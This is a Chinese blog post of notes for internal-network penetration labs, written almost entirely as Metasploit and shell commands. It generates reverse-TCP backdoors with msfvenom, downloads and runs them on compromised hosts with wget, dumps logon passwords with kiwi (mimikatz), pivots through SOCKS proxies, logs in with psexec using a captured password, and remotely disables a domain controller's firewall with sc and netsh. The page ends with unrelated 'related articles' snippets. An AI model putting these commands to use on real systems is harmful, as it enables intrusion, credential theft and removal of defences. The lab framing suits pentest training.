美文网首页
内网打靶知识点总结

内网打靶知识点总结

作者: migrate_ | 来源:发表于2021-08-16 16:54 被阅读0次
msf内网主机存存活扫描
use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.52.1-255
set threads 5
run
Metasploit 脚本Web传递攻击
use exploit/multi/script/web_delivery
show targets
set target 7   #Linux
show payloads
set payload 7  #linux/x64/meterpreter/reverse_tcp
set lhost 192.168.43.203
run
#复制去机器上运行
meterpreter添加路由
#meterpreter终端
run autoroute -s 192.168.52.0/24 #添加路由
run autoroute -p
background
生成木马
msfvenom -p linux/x64/meterpreter/reverse_tcp lport=5555 -f elf -o shell.elf  #生成木马
上传木马
sessions 1
upload /home/kali/shell.elf /tmp/shell.elf   #上传木马
background
监听木马上线
use exploit/multi/handler   
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.43.203
set lport 5555
run
目标不出网,从同网段的肉鸡上下载木马
#192.168.52.10终端(肉鸡开始web服务)
python3 -m http.server                           
#192.168.52.20终端(shell,下载木马上线msf)
wget http://192.168.52.10:8000/shell.elf;chmod +x shell.elf;./shell.elf 
内网读取hash

如果机器是x64系统(必须先注入x64的进程才能运行)

ps              #找到x64的进程pid
migrate 1614    #注入到64位的程序
load kiwi       #运行程序
kiwi_cmd privilege::debug   #提升权限
kiwi_cmd sekurlsa::logonPasswords  # 读取密码
-------------------------------------------------
meterpreter > creds_tspkg
meterpreter > kiwi_cmd -f sekurlsa::logonpasswords
注:自动迁移进程命令:run post/windows/manage/migrate
输入getpid查看当前PID,发现变为1416
进程迁移完后,原先PID为236的进行会自动关闭,如未关闭可以输入kill 236 杀掉进程
msf开启代理
use auxiliary/server/socks_proxy
set SRVHOST  0.0.0.0
set SRVPORT  1080
run
代理运用
proxychains rdesktop 192.168.93.20
管理多个jobs
help
jobs
kill 6
内网打ms17_010(设置好正向或者反向payload是关键)
先用MSF生成dll文件
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=443 -f dll > x64.dll
将x64.dll放到工具目录替换原来的,MSF设置好监听
psexec登陆(假如抓到了密码)如果不成功可能是防火墙的原因
use exploit/windows/smb/psexec
set rhosts 192.168.93.30
set SMBUser administrator
set SMBPass Whoami2021
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
run
控制第二层网络的Windows 7远程关闭域控的防火墙

控制第二层网络的Windows 7与域控建立ipc连接

meterpreter>shell
net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"

使用sc远程在域制器(192.168.93.30)上创建服务关闭防火墙

sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall

再次尝试执行 exploit/windows/smb/psexec 模块登录

msf和cs联动

metasploit与Cobaltstrike互相派生shell

代理搭建(一)

1.png 2.png

代理就使用浏览器的sock4代理,ip就是服务端的,端口是是我们刚刚自定义的

代理搭建(二)

3.png

把代码复制到metasploit控制台中,将metasploit中的流量引入到此socks代理

4.png
listen中继

在现有机器上使用中转

5.png 6.png

生成木马

7.png

相关文章

  • 内网打靶知识点总结

    msf内网主机存存活扫描 Metasploit 脚本Web传递攻击 meterpreter添加路由 生成木马 上传...

  • 内网横向打靶

    遵纪守法 任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危...

  • 如何激发团队的能动性?

    把今天打靶和以前打靶的情况作对比,不难发现:今天大家的参与热情比较高,不管是打靶中还是打靶归来后保养枪支。 出现这...

  • 打靶

    曾经有一个小姑娘面试的时候有和我说过她听到过一句话”招聘就像打靶”终有中枪的那一天,只是时间的问题,

  • 打靶

    美国持枪是合法的,办张持枪证比办钓鱼证还容易,对居民身份也没什么太大要求,连没有绿卡的外国留学生也可以申请。最近美...

  • 打靶

    我年轻时喜欢运动,身体素质不错,只因家庭出身问题没能当兵。直到我下乡后被选调到了铁路,当了基干民兵才摸上枪,打靶的...

  • 打靶

    “砰!”一声巨响在耳边炸起,整个人差点跳起来。一组十四个人,每人两发子弹,已经有人开了第一枪了。这是他第一次打靶。...

  • 打靶

    有种人很奇怪他和任何人都无法长久地保持友谊,只能通过树立共同的敌人来维持友谊。于是,他必须要不停地找目标,找好...

  • 打靶

    隔壁是个靶场,每天都会有人在训练。 突然有一天开始打靶了,你知道那种除夕夜农村开始庆祝放炮竹么?不是一起放那种,是...

  • 打靶

    傍晚时分,太阳已经落山,天还是亮着的,几声清脆的枪声划过寂静的乡村,枪声在多山的上空回荡着,特别清晰。孩子听到这声...

网友评论

      本文标题:内网打靶知识点总结

      本文链接:https://www.haomeiwen.com/subject/ibombltx.html